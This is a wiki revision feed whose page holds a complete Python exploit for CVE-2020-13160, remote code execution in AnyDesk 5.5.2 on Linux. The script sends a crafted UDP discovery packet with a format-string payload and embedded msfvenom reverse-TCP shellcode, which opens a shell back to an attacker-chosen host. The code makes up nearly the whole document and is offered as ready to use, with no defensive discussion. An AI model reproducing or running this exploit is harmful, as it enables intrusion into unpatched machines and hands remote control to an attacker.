https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-13160_AnyDesk_5.5.2%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2020-13160 AnyDesk 5.5.2遠程代碼執行漏洞 - Revision history
2026-04-17T01:41:42Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2020-13160_AnyDesk_5.5.2%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=336&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: AnyDesk 5.5.2 - Remote Code Execution # Date: 09/06/20 # Exploit Author: scryh # Vendor Homepage: https://anydesk.com/en # Version: 5.5.2 # Test..."
2021-03-12T07:59:05Z
<p>Created page with "==EXP== <pre> # Exploit Title: AnyDesk 5.5.2 - Remote Code Execution # Date: 09/06/20 # Exploit Author: scryh # Vendor Homepage: https://anydesk.com/en # Version: 5.5.2 # Test..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: AnyDesk 5.5.2 - Remote Code Execution<br />
# Date: 09/06/20<br />
# Exploit Author: scryh<br />
# Vendor Homepage: https://anydesk.com/en<br />
# Version: 5.5.2<br />
# Tested on: Linux<br />
# Walkthrough: https://devel0pment.de/?p=1881<br />
<br />
#!/usr/bin/env python<br />
import struct<br />
import socket<br />
import sys<br />
<br />
ip = '192.168.x.x'<br />
port = 50001<br />
<br />
def gen_discover_packet(ad_id, os, hn, user, inf, func):<br />
d = chr(0x3e)+chr(0xd1)+chr(0x1)<br />
d += struct.pack('>I', ad_id)<br />
d += struct.pack('>I', 0)<br />
d += chr(0x2)+chr(os)<br />
d += struct.pack('>I', len(hn)) + hn<br />
d += struct.pack('>I', len(user)) + user<br />
d += struct.pack('>I', 0)<br />
d += struct.pack('>I', len(inf)) + inf<br />
d += chr(0)<br />
d += struct.pack('>I', len(func)) + func<br />
d += chr(0x2)+chr(0xc3)+chr(0x51)<br />
return d<br />
<br />
# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode<br />
shellcode = b""<br />
shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48"<br />
shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\xcb\x46\x40"<br />
shellcode += b"\x6c\xed\xa4\xe0\xfb\x48\x31\x58\x27\x48\x2d"<br />
shellcode += b"\xf8\xff\xff\xff\xe2\xf4\xa1\x6f\x18\xf5\x87"<br />
shellcode += b"\xa6\xbf\x91\xca\x18\x4f\x69\xa5\x33\xa8\x42"<br />
shellcode += b"\xc9\x46\x41\xd1\x2d\x0c\x96\xf8\x9a\x0e\xc9"<br />
shellcode += b"\x8a\x87\xb4\xba\x91\xe1\x1e\x4f\x69\x87\xa7"<br />
shellcode += b"\xbe\xb3\x34\x88\x2a\x4d\xb5\xab\xe5\x8e\x3d"<br />
shellcode += b"\x2c\x7b\x34\x74\xec\x5b\xd4\xa9\x2f\x2e\x43"<br />
shellcode += b"\x9e\xcc\xe0\xa8\x83\xcf\xa7\x3e\xba\xec\x69"<br />
shellcode += b"\x1d\xc4\x43\x40\x6c\xed\xa4\xe0\xfb"<br />
<br />
print('sending payload ...')<br />
p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln'+shellcode, '\x85\xfe%18472249x%93$ln', 'ad', 'main')<br />
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)<br />
s.sendto(p, (ip, port))<br />
s.close()<br />
print('reverse shell should connect within 5 seconds')<br />
</pre></div>
Pwnwiki